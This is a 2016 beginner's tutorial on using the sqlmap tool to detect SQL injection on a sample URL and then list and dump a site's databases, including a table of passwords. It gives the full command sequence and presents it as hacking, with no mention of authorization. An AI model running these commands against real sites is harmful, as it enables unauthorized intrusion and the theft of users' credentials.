
BEGINNER'S GUIDE TO EXTRACTING WEBSITE DATABASES VIA SQLMAP

2016-09-06

Category : Information security Management

INTRODUCTION:-

Sqlmap is one of the most popular and powerful SQL injection automation tools out there. Given a vulnerable website, sqlmap can exploit the database and do a lot of hacking, like getting usernames and passwords. Under certain conditions it can even read and write files on the server.


INSTALLING THE TOOL:-



  • Since it's written in Python, first you have to install Python on your system.
  • Then you have to download sqlmap from their website, "www.sqlmap.org".
  • Download the zip or tar file and open it.
  • Inside the folder you will see a Python file with the name "sqlmap.py".
  • Drag it into the terminal and press enter.
  • If everything is done right, sqlmap will start.


HOW IS IT POSSIBLE?

Because the developer of that site did not properly escape the parameter id.

Now we will assume that there is a website that has a URL like this:-

http://www.vulnerable.com/subcat.php?id=5

and it is prone to SQL injection. This can easily be tested by opening the URL with a single quote (') added at the end.

http://www.vulnerable.com/subcat.php?id=5'

If the site reacts in an unusual way or shows an error, it simply means that the site is vulnerable.


LET'S GET ON TO IT, SHALL WE:-

Now it's time to move on to sqlmap to hack such URLs. The sqlmap command is run from the terminal.

type:-  sqlmap.py -u "http://www.vulnerable.com/subcat.php?id=5"


The above is the first command to run with the sqlmap tool. It checks whether the site is vulnerable to SQL injection or not. Once sqlmap confirms that a remote URL is vulnerable to SQL injection and is exploitable, the next step is to find out the names of the databases that exist.

The "--dbs" option is used to get the database list.

type:-  sqlmap.py -u "http://www.vulnerable.com/subcat.php?id=5" --dbs


This will tell you the names of the databases (folders) on the server's hard drive (in this situation the database names are confidential and info).

Now, as we know that a database is saved in the form of tables and columns (just like Excel), we can see the table names in the folder we just got the names of, by using this command:

type:-  sqlmap.py -u "http://www.vulnerable.com/subcat.php?id=5" --tables -D confidential


This will show us the names of the tables in that database. Suppose there is a table by the name "password" (now that is something interesting and confidential).

GETTING EVERYTHING:-

Now comes the most interesting part of extracting the data from the server. 

type:-  sqlmap.py -u "http://www.vulnerable.com/subcat.php?id=5" --dump -D confidential -T password

Congratulations, you got all the passwords.


OR

Also, what you can do is dump all the databases of the website using the command:

type:-  sqlmap.py -u "http://www.vulnerable.com/subcat.php?id=5" --dbs --dump-all




